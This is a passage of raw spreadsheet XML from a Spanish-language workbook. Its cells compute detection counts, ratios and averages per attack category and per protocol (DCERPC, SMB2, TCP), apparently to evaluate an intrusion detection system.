      <c r="DI12" s="607">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="DJ12" s="608">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="DK12" s="609">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="DL12" s="455">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="DM12" s="610"/>
      <c r="DN12" s="610"/>
      <c r="DO12" s="619" t="s">
        <v>633</v>
      </c>
      <c r="DP12" s="620">
        <f>DD12/'(D) - Análisis Resultados I - S'!EB31</f>
        <v>1</v>
      </c>
      <c r="DQ12" s="173"/>
      <c r="DR12" s="619" t="s">
        <v>633</v>
      </c>
      <c r="DS12" s="620">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="DT12" s="173"/>
      <c r="DU12" s="173"/>
      <c r="DV12" s="173"/>
      <c r="DW12" s="572" t="s">
        <v>2419</v>
      </c>
      <c r="DX12" s="221"/>
      <c r="DY12" s="222"/>
      <c r="DZ12" s="173"/>
      <c r="EC12" s="627" t="s">
        <v>2662</v>
      </c>
      <c r="ED12" s="590" t="s">
        <v>2650</v>
      </c>
      <c r="EE12" s="590" t="s">
        <v>2651</v>
      </c>
      <c r="EF12" s="590" t="s">
        <v>2663</v>
      </c>
      <c r="EG12" s="591" t="s">
        <v>2664</v>
      </c>
      <c r="EH12" s="173"/>
      <c r="EI12" s="173"/>
      <c r="EJ12" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ4&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ4*'(B) - Detecciones - Ataques'!HN4/('(B) - Detecciones - Ataques'!HN4+'(B) - Detecciones - Ataques'!HO4),0)</f>
        <v>0</v>
      </c>
      <c r="EK12" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ4&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ4*'(B) - Detecciones - Ataques'!HO4/('(B) - Detecciones - Ataques'!HN4+'(B) - Detecciones - Ataques'!HO4),0)</f>
        <v>0</v>
      </c>
      <c r="EL12" s="173"/>
      <c r="EM12" s="622"/>
      <c r="EN12" s="173"/>
      <c r="EO12" s="379" t="s">
        <v>951</v>
      </c>
      <c r="EP12" s="401">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$HM$3:$HM$139,"&lt;&gt;0",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EO12)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$HM$3:$HM$139,"&lt;&gt;0",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; EO12 &amp; "*")</f>
        <v>9</v>
      </c>
      <c r="EQ12" s="401">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,EO12)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; EO12 &amp; "*")</f>
        <v>10</v>
      </c>
      <c r="ER12" s="623">
        <f t="shared" si="9"/>
        <v>0.9</v>
      </c>
      <c r="ES12" s="401"/>
      <c r="ET12" s="402"/>
      <c r="EV12" s="173"/>
      <c r="EW12" s="20" t="s">
        <v>2456</v>
      </c>
      <c r="EX12" s="336">
        <f>AVERAGEIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!HS3:HS139)</f>
        <v>0.7045454545</v>
      </c>
      <c r="FA12" s="173"/>
      <c r="FB12" s="173"/>
      <c r="FC12" s="173"/>
      <c r="FD12" s="173"/>
      <c r="FE12" s="173"/>
      <c r="FF12" s="173"/>
      <c r="FG12" s="173"/>
      <c r="FH12" s="173"/>
      <c r="FI12" s="173"/>
      <c r="FJ12" s="173"/>
      <c r="FK12" s="173"/>
      <c r="FN12" s="173" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"DCERPC")</f>
        <v>DCERPC</v>
      </c>
      <c r="FO12" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FN12)</f>
        <v>0.6666666667</v>
      </c>
      <c r="FP12" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FN12)</f>
        <v>0.6666666667</v>
      </c>
      <c r="FQ12" s="375">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FN12)</f>
        <v>0.6666666667</v>
      </c>
      <c r="FR12" s="173">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FN12)</f>
        <v>3</v>
      </c>
      <c r="FS12" s="173"/>
      <c r="FT12" s="173"/>
      <c r="FU12" s="173"/>
      <c r="FV12" s="173"/>
      <c r="FW12" s="173"/>
      <c r="FX12" s="173"/>
    </row>
    <row r="13">
      <c r="D13" s="434"/>
      <c r="E13" s="354"/>
      <c r="F13" s="350"/>
      <c r="G13" s="350"/>
      <c r="W13" s="173"/>
      <c r="X13" s="173"/>
      <c r="Y13" s="173"/>
      <c r="Z13" s="173"/>
      <c r="AA13" s="173"/>
      <c r="AB13" s="173"/>
      <c r="AC13" s="173"/>
      <c r="AD13" s="173"/>
      <c r="AE13" s="173"/>
      <c r="AF13" s="173"/>
      <c r="AG13" s="173"/>
      <c r="AH13" s="173"/>
      <c r="AI13" s="173"/>
      <c r="AJ13" s="173"/>
      <c r="AK13" s="173"/>
      <c r="AL13" s="173"/>
      <c r="AM13" s="173"/>
      <c r="AN13" s="173"/>
      <c r="AO13" s="173"/>
      <c r="AP13" s="173"/>
      <c r="AQ13" s="173"/>
      <c r="AR13" s="173"/>
      <c r="AS13" s="173"/>
      <c r="AT13" s="173"/>
      <c r="AU13" s="173"/>
      <c r="AV13" s="173"/>
      <c r="AW13" s="173"/>
      <c r="AX13" s="173"/>
      <c r="AY13" s="173"/>
      <c r="AZ13" s="173"/>
      <c r="BA13" s="173"/>
      <c r="BB13" s="173"/>
      <c r="BC13" s="173"/>
      <c r="BD13" s="173"/>
      <c r="BE13" s="173"/>
      <c r="BF13" s="173"/>
      <c r="BG13" s="173"/>
      <c r="BH13" s="173"/>
      <c r="BI13" s="173"/>
      <c r="BJ13" s="173"/>
      <c r="BK13" s="173"/>
      <c r="BL13" s="173"/>
      <c r="BM13" s="173"/>
      <c r="BN13" s="173"/>
      <c r="BO13" s="173"/>
      <c r="BP13" s="173"/>
      <c r="BQ13" s="173"/>
      <c r="BR13" s="173"/>
      <c r="BS13" s="173"/>
      <c r="BT13" s="173"/>
      <c r="BU13" s="173"/>
      <c r="BV13" s="173"/>
      <c r="BW13" s="173"/>
      <c r="BX13" s="173"/>
      <c r="BY13" s="173"/>
      <c r="BZ13" s="173"/>
      <c r="CA13" s="173"/>
      <c r="CB13" s="173"/>
      <c r="CC13" s="173"/>
      <c r="CD13" s="173"/>
      <c r="CE13" s="173"/>
      <c r="CF13" s="173"/>
      <c r="CG13" s="173"/>
      <c r="CH13" s="173"/>
      <c r="CI13" s="173"/>
      <c r="CJ13" s="173"/>
      <c r="CK13" s="173"/>
      <c r="CL13" s="173"/>
      <c r="CM13" s="173"/>
      <c r="CN13" s="173"/>
      <c r="CO13" s="173"/>
      <c r="CP13" s="173"/>
      <c r="CQ13" s="173"/>
      <c r="CR13" s="173"/>
      <c r="CS13" s="173"/>
      <c r="CT13" s="173"/>
      <c r="CU13" s="173"/>
      <c r="CV13" s="173"/>
      <c r="CW13" s="173"/>
      <c r="CX13" s="173"/>
      <c r="CY13" s="173"/>
      <c r="CZ13" s="173"/>
      <c r="DA13" s="173"/>
      <c r="DB13" s="173"/>
      <c r="DC13" s="628" t="s">
        <v>1725</v>
      </c>
      <c r="DD13" s="617">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GV$3:$GV$139,'(B) - Detecciones - Ataques'!$B$3:$B$139,DC13,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔")</f>
        <v>0</v>
      </c>
      <c r="DE13" s="618">
        <v>0.0</v>
      </c>
      <c r="DF13" s="20" t="s">
        <v>12</v>
      </c>
      <c r="DG13" s="20">
        <v>0.0</v>
      </c>
      <c r="DH13" s="629" t="s">
        <v>12</v>
      </c>
      <c r="DI13" s="607">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="DJ13" s="630" t="s">
        <v>12</v>
      </c>
      <c r="DK13" s="609">
        <v>0.0</v>
      </c>
      <c r="DL13" s="631" t="s">
        <v>12</v>
      </c>
      <c r="DM13" s="610"/>
      <c r="DN13" s="610"/>
      <c r="DO13" s="619" t="s">
        <v>1725</v>
      </c>
      <c r="DP13" s="620">
        <f>DD13/'(D) - Análisis Resultados I - S'!EB32</f>
        <v>0</v>
      </c>
      <c r="DQ13" s="173"/>
      <c r="DR13" s="619" t="s">
        <v>1725</v>
      </c>
      <c r="DS13" s="620" t="s">
        <v>12</v>
      </c>
      <c r="DT13" s="173"/>
      <c r="DU13" s="173"/>
      <c r="DV13" s="173"/>
      <c r="DW13" s="572"/>
      <c r="DX13" s="632"/>
      <c r="DY13" s="633"/>
      <c r="DZ13" s="173"/>
      <c r="EC13" s="634"/>
      <c r="ED13" s="403"/>
      <c r="EE13" s="403"/>
      <c r="EF13" s="403"/>
      <c r="EG13" s="635"/>
      <c r="EH13" s="173"/>
      <c r="EI13" s="173"/>
      <c r="EJ13" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ5&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ5*'(B) - Detecciones - Ataques'!HN5/('(B) - Detecciones - Ataques'!HN5+'(B) - Detecciones - Ataques'!HO5),0)</f>
        <v>0</v>
      </c>
      <c r="EK13" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ5&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ5*'(B) - Detecciones - Ataques'!HO5/('(B) - Detecciones - Ataques'!HN5+'(B) - Detecciones - Ataques'!HO5),0)</f>
        <v>1</v>
      </c>
      <c r="EL13" s="173"/>
      <c r="EM13" s="622"/>
      <c r="EN13" s="173"/>
      <c r="EO13" s="379"/>
      <c r="EP13" s="401"/>
      <c r="EQ13" s="401"/>
      <c r="ER13" s="623"/>
      <c r="ES13" s="401"/>
      <c r="ET13" s="402"/>
      <c r="EV13" s="173"/>
      <c r="EW13" s="20"/>
      <c r="EX13" s="336"/>
      <c r="FA13" s="173"/>
      <c r="FB13" s="173"/>
      <c r="FC13" s="173"/>
      <c r="FD13" s="173"/>
      <c r="FE13" s="173"/>
      <c r="FF13" s="173"/>
      <c r="FG13" s="173"/>
      <c r="FH13" s="173"/>
      <c r="FI13" s="173"/>
      <c r="FJ13" s="173"/>
      <c r="FK13" s="173"/>
      <c r="FN13" s="173" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"SMB2")</f>
        <v>SMB2</v>
      </c>
      <c r="FO13" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FN13)</f>
        <v>0.8</v>
      </c>
      <c r="FP13" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FN13)</f>
        <v>0.8666666667</v>
      </c>
      <c r="FQ13" s="375">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FN13)</f>
        <v>1</v>
      </c>
      <c r="FR13" s="173">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FN13)</f>
        <v>5</v>
      </c>
      <c r="FS13" s="173"/>
      <c r="FT13" s="173"/>
      <c r="FU13" s="173"/>
      <c r="FV13" s="173"/>
      <c r="FW13" s="173"/>
      <c r="FX13" s="173"/>
    </row>
    <row r="14">
      <c r="D14" s="434"/>
      <c r="E14" s="354"/>
      <c r="F14" s="377"/>
      <c r="G14" s="377"/>
      <c r="W14" s="173"/>
      <c r="X14" s="173"/>
      <c r="Y14" s="173"/>
      <c r="Z14" s="173"/>
      <c r="AA14" s="173"/>
      <c r="AB14" s="173"/>
      <c r="AC14" s="173"/>
      <c r="AD14" s="173"/>
      <c r="AE14" s="173"/>
      <c r="AF14" s="173"/>
      <c r="AG14" s="173"/>
      <c r="AH14" s="173"/>
      <c r="AI14" s="173"/>
      <c r="AJ14" s="173"/>
      <c r="AK14" s="173"/>
      <c r="AL14" s="173"/>
      <c r="AM14" s="173"/>
      <c r="AN14" s="173"/>
      <c r="AO14" s="173"/>
      <c r="AP14" s="173"/>
      <c r="AQ14" s="173"/>
      <c r="AR14" s="173"/>
      <c r="AS14" s="173"/>
      <c r="AT14" s="173"/>
      <c r="AU14" s="173"/>
      <c r="AV14" s="173"/>
      <c r="AW14" s="173"/>
      <c r="AX14" s="173"/>
      <c r="AY14" s="173"/>
      <c r="AZ14" s="173"/>
      <c r="BA14" s="173"/>
      <c r="BB14" s="173"/>
      <c r="BC14" s="173"/>
      <c r="BD14" s="173"/>
      <c r="BE14" s="173"/>
      <c r="BF14" s="173"/>
      <c r="BG14" s="173"/>
      <c r="BH14" s="173"/>
      <c r="BI14" s="173"/>
      <c r="BJ14" s="173"/>
      <c r="BK14" s="173"/>
      <c r="BL14" s="173"/>
      <c r="BM14" s="173"/>
      <c r="BN14" s="173"/>
      <c r="BO14" s="173"/>
      <c r="BP14" s="173"/>
      <c r="BQ14" s="173"/>
      <c r="BR14" s="173"/>
      <c r="BS14" s="173"/>
      <c r="BT14" s="173"/>
      <c r="BU14" s="173"/>
      <c r="BV14" s="173"/>
      <c r="BW14" s="173"/>
      <c r="BX14" s="173"/>
      <c r="BY14" s="173"/>
      <c r="BZ14" s="173"/>
      <c r="CA14" s="173"/>
      <c r="CB14" s="173"/>
      <c r="CC14" s="173"/>
      <c r="CD14" s="173"/>
      <c r="CE14" s="173"/>
      <c r="CF14" s="173"/>
      <c r="CG14" s="173"/>
      <c r="CH14" s="173"/>
      <c r="CI14" s="173"/>
      <c r="CJ14" s="173"/>
      <c r="CK14" s="173"/>
      <c r="CL14" s="173"/>
      <c r="CM14" s="173"/>
      <c r="CN14" s="173"/>
      <c r="CO14" s="173"/>
      <c r="CP14" s="173"/>
      <c r="CQ14" s="173"/>
      <c r="CR14" s="173"/>
      <c r="CS14" s="173"/>
      <c r="CT14" s="173"/>
      <c r="CU14" s="173"/>
      <c r="CV14" s="173"/>
      <c r="CW14" s="173"/>
      <c r="CX14" s="173"/>
      <c r="CY14" s="173"/>
      <c r="CZ14" s="173"/>
      <c r="DA14" s="173"/>
      <c r="DB14" s="173"/>
      <c r="DC14" s="616" t="s">
        <v>244</v>
      </c>
      <c r="DD14" s="617">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GV$3:$GV$139,'(B) - Detecciones - Ataques'!$B$3:$B$139,DC14,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔")</f>
        <v>4</v>
      </c>
      <c r="DE14" s="618">
        <v>4.0</v>
      </c>
      <c r="DF14" s="561" t="s">
        <v>12</v>
      </c>
      <c r="DG14" s="173">
        <f t="shared" ref="DG14:DG23" si="10">DD14-DE14</f>
        <v>0</v>
      </c>
      <c r="DH14" s="629" t="s">
        <v>12</v>
      </c>
      <c r="DI14" s="607">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="DJ14" s="608" t="s">
        <v>12</v>
      </c>
      <c r="DK14" s="609">
        <f t="shared" ref="DK14:DK23" si="11">DD14-DI14</f>
        <v>0</v>
      </c>
      <c r="DL14" s="455" t="s">
        <v>12</v>
      </c>
      <c r="DM14" s="610"/>
      <c r="DN14" s="610"/>
      <c r="DO14" s="619" t="s">
        <v>244</v>
      </c>
      <c r="DP14" s="620">
        <f>DD14/'(D) - Análisis Resultados I - S'!EB33</f>
        <v>0.5714285714</v>
      </c>
      <c r="DQ14" s="173"/>
      <c r="DR14" s="619" t="s">
        <v>244</v>
      </c>
      <c r="DS14" s="620">
        <f t="shared" ref="DS14:DS20" si="12">DE14/DD14</f>
        <v>1</v>
      </c>
      <c r="DT14" s="173"/>
      <c r="DU14" s="173"/>
      <c r="DV14" s="173"/>
      <c r="DW14" s="583" t="s">
        <v>2452</v>
      </c>
      <c r="DX14" s="584" t="s">
        <v>2477</v>
      </c>
      <c r="DY14" s="585">
        <f>E26</f>
        <v>0.5378890268</v>
      </c>
      <c r="DZ14" s="173"/>
      <c r="EC14" s="636" t="s">
        <v>2093</v>
      </c>
      <c r="ED14" s="637">
        <f>(SUMIFS($EJ$11:$EJ$147,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EC14,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS($EJ$11:$EJ$147,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC14  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EC14,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC14  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>0.02255418013</v>
      </c>
      <c r="EE14" s="336">
        <f>(SUMIFS($EK$11:$EK$147,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EC14,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS($EK$11:$EK$147,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC14  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EC14,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC14  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>0.2</v>
      </c>
      <c r="EF14" s="336">
        <f>IF((COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EC14,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC14  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2"))&lt;&gt;0,(SUMIFS($EJ$11:$EJ$147,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EC14,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+SUMIFS($EJ$11:$EJ$147,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC14  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EC14,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC14  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")),"-")</f>
        <v>0</v>
      </c>
      <c r="EG14" s="337">
        <f>(SUMIFS($EK$11:$EK$147,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EC14,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+SUMIFS($EK$11:$EK$147,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC14  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EC14,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC14  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2"))</f>
        <v>0</v>
      </c>
      <c r="EH14" s="173"/>
      <c r="EI14" s="173"/>
      <c r="EJ14" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ6&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ6*'(B) - Detecciones - Ataques'!HN6/('(B) - Detecciones - Ataques'!HN6+'(B) - Detecciones - Ataques'!HO6),0)</f>
        <v>0</v>
      </c>
      <c r="EK14" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ6&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ6*'(B) - Detecciones - Ataques'!HO6/('(B) - Detecciones - Ataques'!HN6+'(B) - Detecciones - Ataques'!HO6),0)</f>
        <v>0</v>
      </c>
      <c r="EL14" s="173"/>
      <c r="EM14" s="622"/>
      <c r="EN14" s="173"/>
      <c r="EO14" s="379" t="s">
        <v>633</v>
      </c>
      <c r="EP14" s="401">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$HM$3:$HM$139,"&lt;&gt;0",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EO14)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$HM$3:$HM$139,"&lt;&gt;0",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; EO14 &amp; "*")</f>
        <v>3</v>
      </c>
      <c r="EQ14" s="401">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,EO14)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; EO14 &amp; "*")</f>
        <v>4</v>
      </c>
      <c r="ER14" s="623">
        <f t="shared" ref="ER14:ER24" si="13">EP14/EQ14</f>
        <v>0.75</v>
      </c>
      <c r="ES14" s="401"/>
      <c r="ET14" s="402"/>
      <c r="EV14" s="173"/>
      <c r="EW14" s="20" t="s">
        <v>2665</v>
      </c>
      <c r="EX14" s="336">
        <f>EX10/(SUM('(B) - Detecciones - Ataques'!N3:O139))</f>
        <v>0.008116699137</v>
      </c>
      <c r="FA14" s="173"/>
      <c r="FB14" s="173"/>
      <c r="FC14" s="173"/>
      <c r="FD14" s="173"/>
      <c r="FE14" s="173"/>
      <c r="FF14" s="173"/>
      <c r="FG14" s="173"/>
      <c r="FH14" s="173"/>
      <c r="FI14" s="173"/>
      <c r="FJ14" s="173"/>
      <c r="FK14" s="173"/>
      <c r="FN14" s="173" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"TCP")</f>
        <v>TCP</v>
      </c>
      <c r="FO14" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FN14)</f>
        <v>0.4946749849</v>
      </c>
      <c r="FP14" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FN14)</f>
        <v>0.5235750972</v>
      </c>
      <c r="FQ14" s="375">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FN14)</f>
        <v>0.6666666667</v>
      </c>
      <c r="FR14" s="173">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FN14)</f>
        <v>18</v>
      </c>
      <c r="FS14" s="173"/>
      <c r="FT14" s="173"/>
      <c r="FU14" s="173"/>
      <c r="FV14" s="173"/>
      <c r="FW14" s="173"/>
      <c r="FX14" s="173"/>
    </row>
    <row r="15">
      <c r="D15" s="340" t="s">
        <v>2666</v>
      </c>
      <c r="E15" s="341" t="s">
        <v>2667</v>
      </c>
      <c r="G15" s="291" t="s">
        <v>2668</v>
      </c>
      <c r="H15" s="292"/>
      <c r="I15" s="292"/>
      <c r="J15" s="292"/>
      <c r="K15" s="292"/>
      <c r="L15" s="292"/>
      <c r="M15" s="292"/>
      <c r="N15" s="292"/>
      <c r="O15" s="292"/>
      <c r="P15" s="292"/>
      <c r="Q15" s="292"/>
      <c r="R15" s="292"/>
      <c r="S15" s="292"/>
      <c r="T15" s="292"/>
      <c r="U15" s="293"/>
      <c r="W15" s="294" t="s">
        <v>2668</v>
      </c>
      <c r="X15" s="292"/>
      <c r="Y15" s="292"/>
      <c r="Z15" s="292"/>
      <c r="AA15" s="292"/>
      <c r="AB15" s="292"/>
      <c r="AC15" s="292"/>
      <c r="AD15" s="292"/>
      <c r="AE15" s="292"/>
      <c r="AF15" s="292"/>
      <c r="AG15" s="292"/>
      <c r="AH15" s="292"/>
      <c r="AI15" s="292"/>
      <c r="AJ15" s="292"/>
      <c r="AK15" s="292"/>
      <c r="AL15" s="292"/>
      <c r="AM15" s="292"/>
      <c r="AN15" s="292"/>
      <c r="AO15" s="292"/>
      <c r="AP15" s="292"/>
      <c r="AQ15" s="292"/>
      <c r="AR15" s="292"/>
      <c r="AS15" s="292"/>
      <c r="AT15" s="292"/>
      <c r="AU15" s="292"/>
      <c r="AV15" s="292"/>
      <c r="AW15" s="292"/>
      <c r="AX15" s="292"/>
      <c r="AY15" s="292"/>
      <c r="AZ15" s="292"/>
      <c r="BA15" s="292"/>
      <c r="BB15" s="292"/>
      <c r="BC15" s="292"/>
      <c r="BD15" s="292"/>
      <c r="BE15" s="292"/>
      <c r="BF15" s="292"/>
      <c r="BG15" s="292"/>
      <c r="BH15" s="292"/>
      <c r="BI15" s="292"/>
      <c r="BJ15" s="292"/>
      <c r="BK15" s="292"/>
      <c r="BL15" s="292"/>
      <c r="BM15" s="292"/>
      <c r="BN15" s="292"/>
      <c r="BO15" s="292"/>
      <c r="BP15" s="292"/>
      <c r="BQ15" s="292"/>
      <c r="BR15" s="292"/>
      <c r="BS15" s="292"/>
      <c r="BT15" s="292"/>
      <c r="BU15" s="292"/>
      <c r="BV15" s="292"/>
      <c r="BW15" s="292"/>
      <c r="BX15" s="292"/>
      <c r="BY15" s="292"/>
      <c r="BZ15" s="292"/>
      <c r="CA15" s="292"/>
      <c r="CB15" s="292"/>
      <c r="CC15" s="292"/>
      <c r="CD15" s="292"/>
      <c r="CE15" s="292"/>
      <c r="CF15" s="292"/>
      <c r="CG15" s="292"/>
      <c r="CH15" s="292"/>
      <c r="CI15" s="292"/>
      <c r="CJ15" s="292"/>
      <c r="CK15" s="292"/>
      <c r="CL15" s="292"/>
      <c r="CM15" s="292"/>
      <c r="CN15" s="292"/>
      <c r="CO15" s="292"/>
      <c r="CP15" s="292"/>
      <c r="CQ15" s="292"/>
      <c r="CR15" s="292"/>
      <c r="CS15" s="292"/>
      <c r="CT15" s="292"/>
      <c r="CU15" s="292"/>
      <c r="CV15" s="292"/>
      <c r="CW15" s="292"/>
      <c r="CX15" s="292"/>
      <c r="CY15" s="293"/>
      <c r="CZ15" s="574"/>
      <c r="DA15" s="574"/>
      <c r="DB15" s="574"/>
      <c r="DC15" s="638" t="s">
        <v>427</v>
      </c>
      <c r="DD15" s="639">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GV$3:$GV$139,'(B) - Detecciones - Ataques'!$B$3:$B$139,DC15,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔")</f>
        <v>1</v>
      </c>
      <c r="DE15" s="618">
        <v>1.0</v>
      </c>
      <c r="DF15" s="561" t="s">
